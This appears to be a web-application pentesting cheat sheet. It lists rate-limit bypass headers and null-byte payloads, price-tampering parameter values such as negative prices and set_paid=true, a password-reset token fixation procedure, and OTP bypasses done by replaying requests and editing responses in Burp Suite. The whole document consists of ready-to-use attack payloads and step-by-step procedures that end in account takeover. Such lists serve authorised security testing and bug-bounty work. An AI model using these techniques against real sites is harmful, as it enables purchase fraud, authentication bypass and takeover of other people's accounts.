Rate Limit:
----------- If protection 

- Custom HTTP Method
- Custom HTTP Header

1) If the request goes GET then try to change it to POST,PUT,UPDATE ....
2) If you want to bypass the rate-limit, you can add:

IP: 
------
127.0.0.1
localhost
0.0.0.0
0
127.0.1.1

X-Forwarded-For: IP
X-Forwarded-By: IP
X-Forwarded-For-Original: IP
Forwarded-For: IP
X-Original-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Custom-IP-Authorization: IP
X-Remote-Addr: IP
Forward-For: IP

Bypass the rate-limit by using special char:
--------------------------------------------
email=user@target.comPAYLOAD
{"email":"user@target.comPAYLOAD"}

1. Try adding a space char after email

email=user@target.com 
{"email":"user@target.com "}

2. Adding Null Byte [ %00 ]

email=user@target.com%00
{"email":"user@target.com%00"}

3. Common char: 

%0d
%0a
%0d0a
%2e
%09
%20
%0
%00
%0c

_________________________________________________________

Price Manipulation [ Parameter Tempering ]
------------------------------------------

price=400.00
quantity=2
product_id=5
currency_code=USD
________________________________________________________________
price=899.00	||		price=1.00
price=899.00	||		price=001.00
price=899.00	||		price=-1.00
________________________________________________________________
quantity=2&price=800.00		||		quantity=12&price=800.00
________________________________________________________________
price=899.00&currency_code=USD || price=899.00&currency_code=INR
________________________________________________________________
price= &currency_code=USD
________________________________________________________________
price=899.00&price=&currency_code=USD
________________________________________________________________
price=899.00&discount=500.00
________________________________________________________________
price=899.00&set_paid=false || price=899.00&set_paid=true

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Password Reset Session/Token Fixation:
-----------------------------------------------------------------

a) Create an account having email address "a@x.com", verify & login


b) Now Logout and ask for password reset link. Don't use the password reset link sent to your mail address.

c) Generate new temp email. [ b@x.com ]

c) Login (a@x.com) using the same password back and go to profile and look for 'update your email address' and update it to "b@x.com" and verify the same. Remove "a@x.com".


d) Now logout and use the password reset link which was mailed to "a@x.com" in step 2. check if it still valid.

e) Password will be changed.
__________________________________________________________________________________

Bypassing OTP in registration forms by repeating the form submission multiple times using repeater
----
1. Create an account with a non-existing phone number
2. Intercept the Request in BurpSuite
3. Send the request to the repeater and forward
4. Go to Repeater tab and change the non-existent phone number to your phone number
5. If you got an OTP to your phone, try using that OTP to register that non-existent number


visit -> session -> 9888747475 [fake Number] -> otp
visit -> session -> 8080808080 [Real number] -> otp





OTP Bypass on Register account via Response manipulation
Steps:-
-----
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
response will be
{"verificationStatus":false}

Change this response to
{"verificationStatus":true}

4. And forward the response.

Impact: Account Takeover


OTP bypass:
----
1.Register 2 accounts with any 2 mobile number(first enter right otp)
2.Intercept your request
3.click on action -> Do intercept -> intercept response to this request.
4.check what the message will display like status:1
5.Follow the same procedure with other account but this time enter wrong otp
6.Intercept respone to the request
7.See the message like you get status:0
8.Change status to 1 i.e, status:1 and forward the request if you logged in means you just done authentication bypass.

____________________________________________________________________






















